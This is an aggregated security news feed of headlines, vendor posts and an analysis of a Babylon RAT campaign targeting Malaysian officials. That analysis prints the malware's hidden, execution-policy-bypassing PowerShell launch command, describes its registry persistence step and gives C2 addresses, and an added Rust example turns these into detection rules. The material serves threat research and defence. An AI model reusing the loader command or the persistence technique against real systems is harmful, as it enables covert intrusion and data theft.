August 2024 again saw an uptick in the number of vulnerability disclosures, with several commonly exploited Common Vulnerabilities and Exposures (CVEs) across several platforms. Risk levels may be high, particularly on an enterprise scale, but the number of exploits seen this month demonstrates that there are active attempts to prevent them. This was another month […] The post Peek into Monthly Vulnerabilities: August 2024 appeared first on ThreatMon Blog.

by ThreatMon

The chipmaker said an unidentified attacker stole employee contact information and some encrypted and hashed passwords.

by Cybersecurity Dive

It’s fair to say cyber security has a bad reputation. It’s portrayed as an industry full of stress, where sleepless nights are a prerequisite, and defenders have the weight of the world on their shoulders, while a world of adversaries work determinedly against them. As a frontline defender within the NHS, I can’t dispute some […] The post Championing the Wins to Improve Wellbeing in the Cyber Workplace appeared first on IT Security Guru.

by IT Security Guru

Mobile app developers committed to upholding the highest security standards are faced with several considerations when developing and maintaining banking apps. Learn more. The post Safeguarding Financial Data: Essential Cybersecurity Practices for Mobile Banking appeared first on Zimperium.

by Zimperium

National Cyber Director Harry Coker Jr. unveiled the program as part of an effort to fill a continued gap in cyber, technology and AI positions.

by Cybersecurity Dive

The Chinese-speaking threat actor known as Earth Lusca has been observed using a new backdoor dubbed KTLVdoor as part of a cyber attack targeting an unnamed trading company based in China. The previously unreported malware is written in Golang, and thus is a cross-platform weapon capable of targeting both Microsoft Windows and Linux systems. "KTLVdoor is a highly obfuscated malware that

by The Hacker News

Using special software, WIRED investigated police surveillance at the DNC. We collected signals from nearly 300,000 devices, revealing vulnerabilities for both law enforcement and everyday citizens alike.

by WIRED Security News

Veeam has released security updates for several of its products as part of a single September 2024 security bulletin that addresses 18 high and critical severity flaws in Veeam Backup & Replication, Service Provider Console, and One. [...]

by BleepingComputer

Cisco has released security updates for two critical security flaws impacting its Smart Licensing Utility that could allow unauthenticated, remote attackers to elevate their privileges or access sensitive information. A brief description of the two vulnerabilities is below - CVE-2024-20439 (CVSS score: 9.8) - The presence of an undocumented static user credential for an administrative account

by The Hacker News

A cyber attack hit the German air traffic control agency (DFS) disrupting its operations, experts attribute it to Russia-linked group APT28. A cyber attack targeted the German Air Traffic Control Agency (DFS), as reported by Spiegel and European Truth. DFS, based in Langen near Frankfurt, confirmed that attackers breached its office connection but confirmed that […]

by Security Affairs

New rules to inform investors about cybersecurity attacks on public companies.

by Sophos News

Quishing is a type of phishing attack where crooks use QR codes to trick users into providing sensitive information or downloading malware. In recent years, the spread of electric cars has led to an increase in public charging stations. However, new cyber threats have emerged with this growth, including “quishing.” This term, a combination of […]

by Security Affairs

Researchers from the Ben-Gurion University of the Negev have uncovered a method to leak sensitive data from air-gapped systems, introducing a novel attack technique known as RAMBO (RAM-based electromagnetic covert channel). The attack exploits the electromagnetic emissions generated by a computer's RAM, allowing attackers to exfiltrate information like encryption keys, passwords, biometric data, and files. … The post Novel RAMBO Side-Channel Attack Leaks Data Through RAM Radio Waves appeared first on CyberInsider.

by Cyber Insider

Kaspersky experts found a new variant of the China Chopper web shell from the Tropic Trooper group that imitates an Umbraco CMS module and targets a government entity in the Middle East.

by Securelist

Cloudflare brings visibility to the practice of connection tampering as observed from our global network.

by Cloudflare

New TCP resets and timeouts dataset on Cloudflare Radar surfaces connection tampering, scanning, DoS attacks, and more.

by Cloudflare

The continuation of annual double-digit growth rates, 15% next year, comes as organizations consolidate spending and reassess EPP and EDR needs.

by Cybersecurity Dive

Hackers are targeting other hackers with a fake OnlyFans tool that claims to help steal accounts but instead infects threat actors with the Lumma stealer information-stealing malware. [...]

by BleepingComputer

For three years now, more than a thousand social media accounts have been reposting the same pro-India, anti-Pakistan content on Facebook and X.

by Dark Reading

Multiple studies show that artificial intelligence (AI) is expected to increase revenues and profits for Managed Service Providers (MSPs). However, they also show that AI-enhanced security is struggling to keep up with AI-enhanced attacks.

by Barracuda

Intellexa’s Predator spyware infrastructure re-emerges after sanctions. Learn how this mercenary spyware is evolving, targeting high-profile individuals, and what defensive measures can be taken.

by Recorded Future

This vulnerability allows local attackers to escalate privileges on affected installations of Malwarebytes Antimalware. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.0. The following CVEs are assigned: CVE-2024-6260.

by Zero Day Initiative Advisories

This vulnerability allows local attackers to escalate privileges on affected installations of Linux Kernel. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39463.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics DIAScreen. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-7502.

by Zero Day Initiative Advisories

JFrog's cybersecurity researchers have identified a new PyPI attack technique called "Revival Hijack," which exploits package deletion policies. Over 22,000 packages are at risk, potentially impacting thousands of users. Stay informed!

by Hackread

To deal with today’s complex and constantly evolving threat landscape and an expanding attack surface, organizations have added a wide range of cybersecurity solutions as they try to improve their security posture and protect their networks, applications, and data.

by Barracuda

The White House Office of the National Cyber Director released a plan outlining steps network operators and service providers need to take to secure BGP from abuse and configuration errors.

by Dark Reading

North Korean threat actors have leveraged a fake Windows video conferencing application impersonating FreeConference.com to backdoor developer systems as part of an ongoing financially-driven campaign dubbed Contagious Interview. The new attack wave, spotted by Singaporean company Group-IB in mid-August 2024, is yet another indication that the activity is also leveraging native installers for

by The Hacker News

Adversaries reusing abandoned package names sneak malware into organizations in a sort of software shell game.

by Dark Reading

Cisco has issued a critical security advisory for its Smart Licensing Utility, highlighting two severe vulnerabilities that could allow remote attackers to gain control of systems or access sensitive data without authentication. The vulnerabilities, identified as CVE-2024-20439 and CVE-2024-20440, received a critical CVSS score of 9.8. Both flaws stem from improper credential handling and excessive … The post Cisco Warns of Severe Vulnerabilities in Licensing Tool appeared first on CyberInsider.

by Cyber Insider

Yubico has disclosed a security vulnerability affecting certain YubiKey and YubiHSM devices, which rely on Infineon''s cryptographic library. This flaw allows sophisticated attackers with physical access to potentially recover private keys used in cryptographic operations. While the vulnerability is significant, it affects only older firmware versions, and Yubico has since removed the flawed library from … The post Yubico Discloses Unfixable Cryptographic Flaw on Some YubiKeys appeared first on CyberInsider.

by Cyber Insider

The hiring effort comes after X, formerly known as Twitter, laid off 80% of its trust and safety staff since Musk's takeover. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Google has released its monthly security updates for the Android operating system to address a known security flaw that it said has come under active exploitation in the wild. The high-severity vulnerability, tracked as CVE-2024-32896 (CVSS score: 7.8), relates to a case of privilege escalation in the Android Framework component. According to the description of the bug in the NIST National

by The Hacker News

As enterprises increasingly adopt large language models, security concerns are shifting from traditional LLM Firewalls to more advanced LLM Threat Detection and Response.

by ITPro Today

Quantifying the Value of Bug Bounty Programs: ROI, ROM, or Both?

HackerOne, Wed, 09/04/2024 - 11:38

HackerOne customers consistently factor in cost savings when measuring the success of their security engagements, with 59% valuing the estimated savings of reputational or customer-related incidents and 54% valuing the financial savings estimated from avoiding risk. However, quantifying the ROI for security control testing can be challenging due to the intangible nature of cybersecurity benefits. How do you measure the value of preventing something from happening?

Supplementing ROI With ROM

Traditional ROI calculations often fall short in capturing the full value of security investments. Gaining traction as an alternative, and in most cases complementary, assessment mechanism is Return on Mitigation (ROM), which compares the anticipated costs of a security breach with the costs of implementing mitigation strategies. It provides a more nuanced understanding of the qualitative and quantitative benefits of proactive security measures. ROM factors in various potential costs, including:

- Restoring compromised systems
- Lost revenue due to downtime
- Legal and regulatory penalties
- Damage to public trust and reputation

By assessing the effectiveness of mitigation or prevention strategies in terms of potential financial consequences, ROM offers a practical framework for stakeholders to evaluate the tangible and intangible value of security investments. It also shifts the focus from immediate cost savings to long-term resilience, with a magnifying glass on risk management.

“The bug bounty program is the highest ROI across all of our spend. It’s really hard to show ROI, but with bug bounty, I have a baseline. I can say, ‘This vulnerability was able to be found by someone outside the organization. Someone that was not authorized to access this system was able to access it.’ Even with vulnerabilities that are not within our program, bug bounty allows me to put a price tag on them. I can explain this business case and our stakeholders are able to prioritize bug bounty higher than other tools that also generate ROI.”
— Eric Kieling, Head of Application Security, Booking.com

ROI and ROM Calculations

To illustrate the practical benefits of human-powered security testing and calculations of ROI and ROM, consider a case study from the financial services sector. A major financial institution implemented a bug bounty program alongside its existing red teaming efforts. Over the course of a year, the program identified several critical vulnerabilities that had been overlooked by previous tests.

Scenario

Initial security investment: The institution invested $200,000 in the bug bounty program and an additional $100,000 in red teaming exercises.

Potential breach costs: A potential breach was estimated to cost the institution $5 million, including costs associated with restoring compromised systems, lost revenue, legal penalties, and reputational damage.

Return on Investment (ROI)

A simple ROI calculation looks at the return of $300,000 against a potential $5 million breach.

Breach prevention: By identifying and mitigating vulnerabilities, the institution avoided a potential $5 million breach.

Cost of testing: The total investment in proactive security testing was $300,000.

Using Traditional ROI Calculations

Traditional ROI or cost-benefit analyses yield approximately $15.67 in ROI (the $5 million avoided loss net of the $300,000 spent, divided by that $300,000).

If we look at ROM, we compare the cost of implementing security measures against the anticipated breach cost. In this scenario, the ROM indicates that for every dollar spent on mitigation, the organization potentially saves $16.67 in breach costs ($5 million divided by $300,000). For the sake of this case example, we kept these costs simple. However, it is important to remember that breach costs these days include much more than just a simple flat dollar amount. They also include potential ransom payments, compliance requirements, regulatory fines, legal fees, brand damage, and much more. Breaches in the financial services sector, for example, cost an average of $6.08 million.

Real-World ROM

According to the 7th Annual Hacker-Powered Security Report, the median price of a bug on the HackerOne platform is $500, up from $400 in 2022. The average bounty in the 90th percentile is up from $2,500 to $3,000. But here's the dramatic reality: the cost of these vulnerabilities going unnoticed and being exploited in the wild is an overwhelming 1,600 times more than the cost of the bounty — $4.88M on average.

“Since 2019, Zoom has worked with 900 hackers, of which 300 have submitted vulnerabilities that we have had to quickly move on. We’ve paid out over $7 million. It’s a substantial investment but the returns are worth it: we find world-class talent to find real-world solutions before it’s a real-world problem.”
— Michael Adams, CISO, Zoom

Deliver Strategic Value From Security Initiatives With HackerOne

At HackerOne, we’re not only the leader in high-quality, repeatable security engagements — we’re also the experts in helping partners quantify and qualify the value of those engagements for more robust security budgets and successful programs. To learn more about ROI and ROM and the best ways to express the value of proactive security to stakeholders with human-powered security, download the SANS White Paper: Human-Powered Security Testing.

by HackerOne

A new supply chain attack technique targeting the Python Package Index (PyPI) registry has been exploited in the wild in an attempt to infiltrate downstream organizations. It has been codenamed Revival Hijack by software supply chain security firm JFrog, which said the attack method could be used to hijack 22,000 existing PyPI packages and result in "hundreds of thousands" of malicious package

by The Hacker News

Former BCG and Thinkproject Executive to Lead Code Intelligence Through Continued International Expansion

Bonn, Germany — September 05, 2024 — Code Intelligence, the pioneer in AI-automated software testing, today announced the appointment of Dr. Eric Brüggemann as Chief Executive Officer (CEO), as the company continues to scale to meet growing international demand. Former CEO and Co-Founder Sergej Dechand will remain with the organization as Chief Evangelist.

Dr. Brüggemann joined Code Intelligence as Managing Director and Chief Operating Officer (COO) last year, where he led enterprise customer engagements for the company. During his tenure, he laid the foundation for repeatable success and sustainable growth. Prior to Code Intelligence, he served as Chief of Staff at Thinkproject, leading the transformation from a heterogeneous product portfolio into a unified platform as well as expanding and further harmonizing the international footprint across more than 15 countries worldwide.

by Code Intelligence

Hacktivists unite for the #FreeDurov campaign to launch a massive cyber campaign against France in response to Telegram…

by Hackread

Google's new update removes software intended only for cell phone store employees that could have been exploited by bad actors.

by ZDNET Security

The ElectionGuard project allows anyone — voters, campaign staffers, and election officials — to cryptographically verify ballots, a promise which may bolster faith in election integrity.

by Dark Reading

Applications and libraries supporting post-quantum cryptography in 2024

by Kaspersky

Sophisticated social engineering is expected to accompany threat campaigns that are highly targeted and aimed at stealing crypto and deploying malware.

by Dark Reading

Zyxel has released software updates to address a critical security flaw impacting certain access point (AP) and security router versions that could result in the execution of unauthorized commands. Tracked as CVE-2024-7261 (CVSS score: 9.8), the vulnerability has been described as a case of operating system (OS) command injection. "The improper neutralization of special elements in the

by The Hacker News

Account takeover attacks have emerged as one of the most persistent and damaging threats to cloud-based SaaS environments. Yet despite significant investments in traditional security measures, many organizations continue to struggle with preventing these attacks. A new report, "Why Account Takeover Attacks Still Succeed, and Why the Browser is Your Secret Weapon in Stopping Them" argues that the

by The Hacker News

"Hello pervert" sextortion mails keep adding new features to their emails to increase credibility and urge victims to pay.

by Malwarebytes Labs

Every year, the role of AI in cybersecurity grows more prominent. This is especially true in the security operations center (SOC), where AI-native detection and GenAI-fueled workflows are advancing cyber defense and shaping the end-to-end analyst experience. But while defenders are using AI to operate with greater speed and scale, adversaries are following suit, using […]

by CrowdStrike

New research suggests that cyber-thieves can discover and use leaked credentials in a matter of seconds.

by ThreatDown

With the elections at full throttle, we are seeing several types of scams resurfacing, and undoubtedly more will come.

by Malwarebytes Labs

The availability of deepfake technology has given threat actors a valuable tool for social engineering attacks, according to researchers at BlackBerry.

by KnowBe4

In cybersecurity, technology often takes center stage. From the latest AI-driven defenses to sophisticated encryption techniques, it's easy to overlook the most crucial element: the human factor.

by KnowBe4

Beware of “Angry Stealer,” a new malware targeting your online accounts. This rebranded version of Rage Stealer steals…

by Hackread

2024-09-04 14:47:35

OSCP is not the same anymore

A few days ago, OffSec announced a change in the OSCP certification, which will now be called OSCP+. OffSec will replace the current OSCP exam with an updated version that includes the following changes:

1. Changes in the Active Directory portion
2. Removal of bonus points

1. Changes in the Active Directory portion

To meet the changing cybersecurity landscape and prepare candidates for real-world challenges, they have updated the Active Directory portion of the exam. This change is based on the “Assumed Compromised Model,” where you will be provided authorized access to a domain or user. With this initial access to the AD domain, your goal will be full domain compromise.

What are the bonus points?

Bonus points were a way to drive engagement and adoption, but most learners did not require bonus points to pass the OSCP exam. Rather, the exercises required to earn bonus points better enabled learners to train and prepare for a successful OSCP exam experience.

2. Removal of bonus points

Before this change, OffSec allowed candidates to earn up to 10 bonus points in their exam. This meant that if you secured 10 bonus points before attempting the exam, you only needed 60 points to pass the OSCP exam.

However, with the removal of bonus points, candidates will no longer receive this benefit and must secure all 70 points during the exam. This change aims to provide more consistency and fairness across all OffSec exams and certifications.

When you take the OSCP exam, you will earn both the OSCP and OSCP+ certifications. However, the OSCP+ certificate will expire 3 years after issuance, while the OSCP certificate will not expire and is valid for a lifetime.

Candidates can renew their OSCP+ certification in the following ways:

- Pass a recertification exam within 6 months of the OSCP+ expiry
- Pass any other OffSec certification exam: OSEP, OSWA, OSED, or OSEE
- Participate in a CPE program (details to be announced in late 2024)

For existing OSCP holders:

OffSec is offering existing OSCP holders the chance to take the new OSCP+ exam at a discounted price of $199 USD if purchased between 1st Nov 2024 and 31st Mar 2025.

If you are an existing OSCP holder, taking the OSCP+ exam is not mandatory. The changes in the exam will not affect your existing OSCP certification, which remains valid for a lifetime. However, if you want to upgrade to the OSCP+ certification, you will need to take the recertification exam.

Reference: Link to the OffSec Support Portal

OSCP is not the same anymore was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

The Dutch Data Protection Authority (Dutch DPA) has imposed a fine of €30.5 million ($33.7 million) against facial recognition firm Clearview AI for violating the General Data Protection Regulation (GDPR) in the European Union (E.U.) by building an "illegal database with billions of photos of faces," including those of Dutch citizens. "Facial recognition is a highly intrusive technology that you

by The Hacker News

Torrance, United States / California, 4th September 2024, CyberNewsWire

by Hackread

A proximity resilience graph offers a more accurate representation of risk than heat maps and risk registers, and allows CISOs to tell a complex story in a single visualization.

by Dark Reading

Key takeaways

- Cyble Research and Intelligence Lab (CRIL) has identified a highly targeted cyber-attack aimed at political figures and government officials in Malaysia.
- The attack showcases the advanced tactics employed by the Threat Actor (TA) in targeting high-profile individuals and institutions.
- The campaign, active since July, has employed at least three distinct malicious ISO files specifically designed to compromise Malaysian entities.
- The malicious ISO files contain multiple components, including a shortcut (LNK) file, a hidden PowerShell script, a malicious executable, and a decoy PDF file.
- The campaign delivers Babylon RAT as the final payload.
- Babylon RAT, an open-source Remote Access Trojan (RAT), provides unauthorized access to the victim's machine. It allows the TA to execute commands remotely, control the system, and exfiltrate sensitive data.
- Intelligence from Cyble Vision's platform indicates that the TA behind this campaign has previously targeted Malaysian entities using Quasar RAT, another open-source RAT.

Overview

Cyble Research and Intelligence Lab (CRIL) has recently discovered a campaign involving malicious ISO files targeting political figures and government officials within Malaysia. The initial infection vector for this campaign is unclear. The ISO file is crafted with deceptive elements to trick users into thinking they are interacting with legitimate files. It contains a visible shortcut file that mimics a PDF document, alongside a hidden malicious executable, a lure PDF document, and a concealed PowerShell script.

Upon opening the shortcut file, the PowerShell script executes silently in the background, launches the decoy PDF, and copies the malicious executable to the %appdata% directory. The script also creates a registry entry to ensure the executable runs on system startup and then executes the malicious file.

The final payload in this campaign is Babylon RAT, an open-source Remote Access Trojan (RAT) designed for comprehensive surveillance and data theft. Babylon RAT offers a wide range of malicious functionalities, including capturing keystrokes, clipboard monitoring, password extraction, and remote command execution. It enables TAs to covertly monitor user activity and steal sensitive information. The RAT maintains persistence on infected systems through registry modifications, ensuring it can survive reboots and continue operations.

Additionally, Babylon RAT includes a sophisticated control panel, allowing TAs to efficiently manage compromised systems, execute commands remotely, and access stolen data, making it a powerful tool for cyber espionage and data exfiltration. The figure below shows the infection chain.

Figure 1 - Infection chain

Technical Analysis

This campaign has been active since last July, with three distinct malicious ISO files observed targeting Malaysian entities. The use of three different lure documents suggests an attempt to reach a broader audience.

At the end of July, we observed two ISO files: one containing a lure document addressing political concerns in Malaysia, suggesting the campaign targets politically engaged individuals in the country. The other ISO file included a lure related to Majlis Amanah Rakyat (MARA), indicating that the TA is targeting Malaysian government officials. The figures below show the lure documents observed in July.

Figure 2 - Lure document

Figure 3 - Lure document

At the end of August, we identified another malicious ISO file with a lure document related to the MyKHAS system, indicating that the TA is targeting Malaysian government officials who use the MyKHAS platform, as shown below.

Figure 4 - Lure document

In all three ISO files, a similar approach is used: each contains a visible shortcut file that resembles a PDF document, as well as a hidden malicious executable, a lure PDF document, and a concealed PowerShell script, as shown in the figure below.

Figure 5 - Inside the ISO file once mounted

For analysis, we are examining the ISO sample identified in August, named “PANDUAN_PENGGUNA_MyKHAS.iso”, with the SHA-256 value d9f0268cbaa1ae45dfa755adab9dda2d8bdff3c8bf8a00d23bbc6894c28e225f. When the user opens the .lnk file, it silently executes the hidden PowerShell script in the background. This execution is triggered by a command line embedded in the shortcut file:

    %windir%/System32/cmd.exe /c powershell -WindowStyle hidden -nologo -executionpolicy bypass -File "PANDUAN_PENGGUNA_MyKHAS.ps1"

Following this, the PowerShell script (.ps1) opens a decoy PDF file using the Invoke-Item command. It then copies the malicious executable, controller.exe, into the Windows %appdata% directory via the Copy-Item command. To ensure the executable runs automatically at system startup, the script adds a startup entry in the registry under HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run with the name “USBController.” Lastly, the script launches controller.exe from the current directory using the Invoke-Expression command.

Later, the PowerShell script (.ps1) opens the decoy PDF file using the Invoke-Item command. It then copies the malicious executable, controller.exe, to the %appdata% directory using Copy-Item. The script creates a startup entry in the registry under HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run with the name “USBController”, ensuring controller.exe is executed automatically on system startup. Finally, the script starts controller.exe from the %appdata% directory using Invoke-Expression. The figure below shows the content of the malicious PowerShell script.

The executable controller.exe has been identified as a wrapper for Babylon RAT, an open-source remote access tool (RAT) commonly used by TAs for cyber espionage and data exfiltration.

Figure 6 - PowerShell script

Payload Analysis

During our analysis, we discovered that the file controller.exe contains a significant data overlay, approximately 300MB in size, which appears to be intentionally designed to evade detection by security products. This file employs "Dynamic API Resolution" using GetModuleHandle and GetProcAddress. This technique allows the wrapper to dynamically call Win32 cryptographic APIs to decrypt its embedded encrypted content. Specifically, it uses the base data value shown below to generate a 256-bit key via the CryptDeriveKey function, which is subsequently used with the AES-256 algorithm in the CryptDecrypt API to decrypt the payload.

Figure 7 - BaseData value for CryptDeriveKey to create the AES-256 key

Figure 8 - Decrypted payload

The decrypted payload is itself packed with UPX; execution is then transferred to the decrypted payload using the CreateThread Windows API, as shown in the figure below.

Figure 9 - Thread creation

Babylon RAT

The decrypted payload is Babylon RAT, an open-source remote access tool (RAT) widely used by cybercriminals for espionage and data theft. It allows TAs to take full control of a victim's machine remotely, enabling actions like file manipulation, process management, and command execution. The RAT includes keylogging features, capturing user keystrokes to steal sensitive information like passwords. It also supports clipboard monitoring and can take screenshots of the victim's desktop. Persistence mechanisms allow it to survive reboots by modifying system settings or registry keys.

Babylon RAT communicates with a command-and-control (C2) server for further instructions, data exfiltration, and payload delivery. It is often used for long-term surveillance and data harvesting in targeted cyberattacks. The figure below shows the Babylon RAT string present in the process memory.

Figure 10 - Babylon RAT

C&C Communication

The Babylon RAT samples observed in this campaign connect to command-and-control (C&C) servers at 149.28.19[.]207 and 64.176.65[.]152 over port 443, enabling TAs to gain control of the infected machine and exfiltrate sensitive data. While the identity of the TA behind this campaign remains unknown, intelligence from the Cyble Vision Platform indicates that these Malaysian entities were also targeted using Quasar RAT in the past.

Figure 11 - IP address 64.176.65[.]152 details in Cyble Vision

Conclusion

The sophisticated cyber-attack targeting political figures and government officials in Malaysia showcases the heightened interest and advanced techniques of the TAs. The ongoing campaign, involving malicious ISO files, highlights the severity of the threat and the persistent nature of such attacks. The use of Babylon RAT, an open-source Remote Access Trojan, illustrates the capability of these TAs to gain unauthorized control and exfiltrate sensitive data. Additionally, the recurrence of targeting Malaysian entities with similar tools, such as Quasar RAT, emphasizes the need for enhanced security measures and vigilance to defend against these evolving cyber threats.

Recommendations

- Implement advanced email filtering solutions to detect and block malicious attachments, such as ISO files, and prevent them from reaching end users.
- Deploy and regularly update endpoint security solutions, including antivirus and anti-malware software, to detect and mitigate threats like Babylon RAT.
- Implement continuous network monitoring and anomaly detection to identify and respond to unusual activities or unauthorized connections, especially those involving command-and-control servers.
- Conduct comprehensive security awareness training for political figures and government officials to recognize and avoid phishing attempts and malicious files.
- Ensure that all systems and software are kept up to date with the latest security patches to reduce vulnerabilities that could be exploited by threat actors.

MITRE ATT&CK® Techniques

Tactic | Technique | Procedure
Execution (TA0002) | User Execution: Malicious File (T1204.002) | The ISO file contains an LNK file disguised as a PDF. When executed, it runs a PowerShell script to initiate the attack.
Execution (TA0002) | Command and Scripting Interpreter: PowerShell (T1059.001) | The LNK file triggers a PowerShell script to execute the payload and create persistence.
Persistence (TA0003) | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001) | The PowerShell script creates a startup entry in the registry.
Defense Evasion (TA0005) | Dynamic API Resolution (T1027.007) | Cryptographic APIs are resolved at runtime to evade IAT-based detection.
Defense Evasion (TA0005) | LNK Icon Smuggling (T1027.012) | The LNK file is disguised with a PDF icon.
Defense Evasion (TA0005) | Encrypted/Encoded File (T1027.013) | The Babylon RAT payload is encrypted with AES-256 to evade detection by security tools.
Credential Access (TA0006) | Credentials from Password Stores: Credentials from Web Browsers (T1555.003) | Babylon RAT can extract passwords from web browsers.
Discovery (TA0007) | System Information Discovery (T1082) | Babylon RAT collects system information from the victim's machine.
Collection (TA0009) | Clipboard Data (T1115) | Babylon RAT monitors and logs clipboard data, storing it for later exfiltration.
Collection (TA0009) | Input Capture: Keylogging (T1056.001) | The RAT captures keystrokes using the SetWindowsHookEx Win32 API.
Command and Control (TA0011) | Application Layer Protocol: Web Protocols (T1071.001) | Babylon RAT communicates with the TA's C2 server over web protocols.
Exfiltration (TA0010) | Exfiltration Over C2 Channel (T1041) | The TA exfiltrates collected data through the established C2 channel.

Indicators of Compromise

The post The Intricate Babylon RAT Campaign Targets Malaysian Politicians, Government appeared first on Cyble.
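As an added example that is not part of the Cyble report, the following Rust code turns the chain described above into two detection rules (cmd.exe launching a hidden, policy-bypassing PowerShell script file; PowerShell then writing a per-user Run value that points into %appdata%) and correlates them per process, run over constructed Sysmon-style events. The event layout, host name, PID and file paths are assumptions; only the PowerShell flags and the Run key location come from the report.

```rust
// Added example (not from the Cyble report): detection rules for the chain
// described above, LNK -> cmd.exe -> hidden PowerShell -> HKCU Run key, run over
// constructed Sysmon-style events. The event shape, host and paths are assumed;
// only the PowerShell flags and the Run key location come from the report.
use std::collections::HashMap;
#[derive(Debug, Clone, PartialEq, Eq)]
pub enum Event {
    ProcessCreate { host: String, pid: u32, parent_image: String, image: String, cmdline: String },
    RegistrySet { host: String, pid: u32, image: String, target: String, data: String },
}

#[derive(Debug, Clone, PartialEq, Eq)]
pub struct Finding { pub host: String, pub pid: u32, pub rule: &'static str }

// Matched anywhere in the lower-cased target so HKCU\... and HKU\<SID>\... spellings both hit.
const RUN_KEY: &str = r"\software\microsoft\windows\currentversion\run\";

fn basename(path: &str) -> String {
    path.rsplit(['\\', '/']).next().unwrap_or(path).to_ascii_lowercase()
}

/// Rule 1: cmd.exe spawning PowerShell with a hidden window and the execution
/// policy bypassed to run a script file, which is the LNK's embedded command.
pub fn hidden_bypass_script(parent: &str, image: &str, cmdline: &str) -> bool {
    let c = cmdline.to_ascii_lowercase();
    basename(parent) == "cmd.exe"
        && basename(image) == "powershell.exe"
        && c.contains("-windowstyle hidden")
        && c.contains("-executionpolicy bypass")
        && c.contains("-file ")
}

/// Rule 2: PowerShell writing a Run value whose data points under %appdata%,
/// where the script copied controller.exe.
pub fn run_key_to_appdata(image: &str, target: &str, data: &str) -> bool {
    let (t, d) = (target.to_ascii_lowercase(), data.to_ascii_lowercase());
    basename(image) == "powershell.exe"
        && t.contains(RUN_KEY)
        && (d.contains(r"\appdata\roaming\") || d.contains("%appdata%"))
}

/// Evaluate both rules over the stream; a process that trips both is escalated
/// as the full persistence chain.
pub fn detect(events: &[Event]) -> Vec<Finding> {
    let mut findings = Vec::new();
    let mut hits: HashMap<(String, u32), u8> = HashMap::new();
    for e in events {
        let (host, pid, rule) = match e {
            Event::ProcessCreate { host, pid, parent_image, image, cmdline }
                if hidden_bypass_script(parent_image, image, cmdline) =>
            {
                (host, *pid, "cmd_spawns_hidden_bypass_powershell_script")
            }
            Event::RegistrySet { host, pid, image, target, data }
                if run_key_to_appdata(image, target, data) =>
            {
                (host, *pid, "powershell_sets_run_key_to_appdata")
            }
            _ => continue,
        };
        findings.push(Finding { host: host.clone(), pid, rule });
        let n = hits.entry((host.clone(), pid)).or_insert(0);
        *n += 1;
        if *n == 2 {
            findings.push(Finding { host: host.clone(), pid, rule: "lnk_powershell_persistence_chain" });
        }
    }
    findings
}

/// Constructed telemetry: a benign admin script, then the two events the
/// report's PowerShell stage would produce on host "ws01" as PID 4242.
pub fn sample_events() -> Vec<Event> {
    let s = |x: &str| x.to_string();
    let ps = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe";
    vec![
        Event::ProcessCreate {
            host: s("ws01"), pid: 1001,
            parent_image: s(r"C:\Windows\explorer.exe"), image: s(ps),
            cmdline: s(r"powershell -File C:\scripts\backup.ps1"),
        },
        Event::ProcessCreate {
            host: s("ws01"), pid: 4242,
            parent_image: s(r"C:\Windows\System32\cmd.exe"), image: s(ps),
            cmdline: s(r#"powershell -WindowStyle hidden -nologo -executionpolicy bypass -File "PANDUAN_PENGGUNA_MyKHAS.ps1""#),
        },
        Event::RegistrySet {
            host: s("ws01"), pid: 4242, image: s(ps),
            target: s(r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\USBController"),
            data: s(r"C:\Users\alice\AppData\Roaming\controller.exe"),
        },
    ]
}
fn main() {
    for f in detect(&sample_events()) {
        println!("{} pid={} {}", f.host, f.pid, f.rule);
    }
}
```

The benign event is deliberately included to show that the rules key on the hidden window plus policy bypass from cmd.exe, not on PowerShell running a script file by itself.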

by CYBLE

I'm a big fan of YubiKeys and the fact that some of them are vulnerable to being cloned doesn't change that. Let me explain.

by ZDNET Security

In recent years, the platform has become a go-to tool for executing almost all conceivable cybercriminal activity.

by Dark Reading

Posted by Ivan Lozano and Dominik Maier, Android Team Android''s use of safe-by-design principles drives our adoption of memory-safe languages like Rust, making exploitation of the OS increasingly difficult with every release. To provide a secure foundation, we’re extending hardening and the use of memory-safe languages to low-level firmware (including in Trusty apps).In this blog post, we''ll show you how to gradually introduce Rust into your existing firmware, prioritizing new code and the most security-critical code. You''ll see how easy it is to boost security with drop-in Rust replacements, and we''ll even demonstrate how the Rust toolchain can handle specialized bare-metal targets.Drop-in Rust replacements for C code are not a novel idea and have been used in other cases, such as librsvg’s adoption of Rust which involved replacing C functions with Rust functions in-place. We seek to demonstrate that this approach is viable for firmware, providing a path to memory-safety in an efficient and effective manner.Memory Safety for FirmwareFirmware serves as the interface between hardware and higher-level software. Due to the lack of software security mechanisms that are standard in higher-level software, vulnerabilities in firmware code can be dangerously exploited by malicious actors. Modern phones contain many coprocessors responsible for handling various operations, and each of these run their own firmware. Often, firmware consists of large legacy code bases written in memory-unsafe languages such as C or C++. Memory unsafety is the leading cause of vulnerabilities in Android, Chrome, and many other code bases.Rust provides a memory-safe alternative to C and C++ with comparable performance and code size. Additionally it supports interoperability with C with no overhead. 
